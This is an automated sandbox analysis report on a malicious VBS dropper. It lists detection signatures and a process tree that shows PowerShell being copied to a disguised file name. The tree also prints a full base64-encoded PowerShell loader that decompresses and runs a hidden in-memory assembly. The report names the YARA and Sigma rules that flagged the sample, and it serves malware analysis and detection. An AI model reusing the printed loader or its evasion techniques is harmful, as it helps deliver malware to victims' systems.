Edit tour
Windows
Analysis Report
8820_715_SCAN.vbs
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Creates processes via WMI
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6112 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\8820_ 715_SCAN.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 6804 cmdline:
cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\Des ktop\8820_ 715_SCAN.v bs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - 8820_715_SCAN.vbs.exe (PID: 6536 cmdline:
"C:\Users\ user\Deskt op\8820_71 5_SCAN.vbs .exe" -enc JABJAGcAb wB0AGYAbwB hAGMAIAA9A CAAWwBTAHk AcwB0AGUAb QAuAEQAaQB hAGcAbgBvA HMAdABpAGM AcwAuAFAAc gBvAGMAZQB zAHMAXQA6A DoARwBlAHQ AQwB1AHIAc gBlAG4AdAB QAHIAbwBjA GUAcwBzACg AKQAuAE0AY QBpAG4ATQB vAGQAdQBsA GUALgBGAGk AbABlAE4AY QBtAGUALgB SAGUAcABsA GEAYwBlACg AJwAuAGUAe ABlACcALAA nACcAKQA7A CQAQgB1AHA AbABzAHMAZ gBnAGMAegA gAD0AIABnA GUAdAAtAGM AbwBuAHQAZ QBuAHQAIAA kAEkAZwBvA HQAZgBvAGE AYwAgAHwAI ABTAGUAbAB lAGMAdAAtA E8AYgBqAGU AYwB0ACAAL QBMAGEAcwB 0ACAAMQA7A CAAJABVAGM AagBxAHkAd QBlAGUAIAA 9ACAAWwBTA HkAcwB0AGU AbQAuAEMAb wBuAHYAZQB yAHQAXQA6A DoARgByAG8 AbQBCAGEAc wBlADYANAB TAHQAcgBpA G4AZwAoACQ AQgB1AHAAb ABzAHMAZgB nAGMAegAuA FIAZQBwAGw AYQBjAGUAK AAnAFIARQB NACAAJwAsA CAAJwAnACk ALgBSAGUAc ABsAGEAYwB lACgAJwBAA CcALAAgACc AQQAnACkAK QA7ACQAQwB kAG0AdABxA HEAdgB3AG0 AagAgAD0AI ABOAGUAdwA tAE8AYgBqA GUAYwB0ACA AUwB5AHMAd ABlAG0ALgB JAE8ALgBNA GUAbQBvAHI AeQBTAHQAc gBlAGEAbQA oACAALAAgA CQAVQBjAGo AcQB5AHUAZ QBlACAAKQA 7ACQAQwB1A G0AYQBxAHk AagBtACAAP QAgAE4AZQB 3AC0ATwBiA GoAZQBjAHQ AIABTAHkAc wB0AGUAbQA uAEkATwAuA E0AZQBtAG8 AcgB5AFMAd AByAGUAYQB tADsAJABHA HUAegBwAGI AZwBwACAAP QAgAE4AZQB 3AC0ATwBiA GoAZQBjAHQ AIABTAHkAc wB0AGUAbQA uAEkATwAuA EMAbwBtAHA AcgBlAHMAc wBpAG8AbgA uAEcAegBpA HAAUwB0AHI AZQBhAG0AI AAkAEMAZAB tAHQAcQBxA HYAdwBtAGo ALAAgACgAW wBJAE8ALgB DAG8AbQBwA HIAZQBzAHM AaQBvAG4AL gBDAG8AbQB wAHIAZQBzA HMAaQBvAG4 ATQBvAGQAZ QBdADoAOgB EAGUAYwBvA G0AcAByAGU AcwBzACkAO wAkAEcAdQB 6AHAAYgBnA HAALgBDAG8 AcAB5AFQAb wAoACAAJAB DAHUAbQBhA HEAeQBqAG0 AIAApADsAJ ABHAHUAegB wAGIAZwBwA C4AQwBsAG8 AcwBlACgAK QA7ACQAQwB kAG0AdABxA HEAdgB3AG0 AagAuAEMAb ABvAHMAZQA oACkAOwBbA GIAeQB0AGU AWwBdAF0AI AAkAFUAYwB qAHEAeQB1A GUAZQAgAD0 AIAAkAEMAd QBtAGEAcQB 5AGoAbQAuA FQAbwBBAHI AcgBhAHkAK AApADsAWwB BAHIAcgBhA HkAXQA6ADo AUgBlAHYAZ QByAHMAZQA oACQAVQBjA GoAcQB5AHU AZQBlACkAO wAgACQARQB 6AHgAcABnA HoAbgBoAHY AegBqACAAP QAgAFsAUwB 5AHMAdABlA G0ALgBUAGg AcgBlAGEAZ ABpAG4AZwA uAFQAaAByA GUAYQBkAF0 AOgA6AEcAZ QB0AEQAbwB tAGEAaQBuA CgAKQAuAEw AbwBhAGQAK AAkAFUAYwB qAHEAeQB1A GUAZQApADs AIAAkAEQAc wBwAHcAdAA gAD0AIAAkA EUAegB4AHA AZwB6AG4Aa AB2AHoAagA uAEUAbgB0A HIAeQBQAG8 AaQBuAHQAO wAgAFsAUwB 5AHMAdABlA G0ALgBEAGU AbABlAGcAY QB0AGUAXQA 6ADoAQwByA GUAYQB0AGU ARABlAGwAZ QBnAGEAdAB lACgAWwBBA GMAdABpAG8 AbgBdACwAI AAkAEQAcwB wAHcAdAAuA EQAZQBjAGw AYQByAGkAb gBnAFQAeQB wAGUALAAgA CQARABzAHA AdwB0AC4AT gBhAG0AZQA pAC4ARAB5A G4AYQBtAGk AYwBJAG4Ad gBvAGsAZQA oACkAIAB8A CAATwB1AHQ ALQBOAHUAb ABsAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2520 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |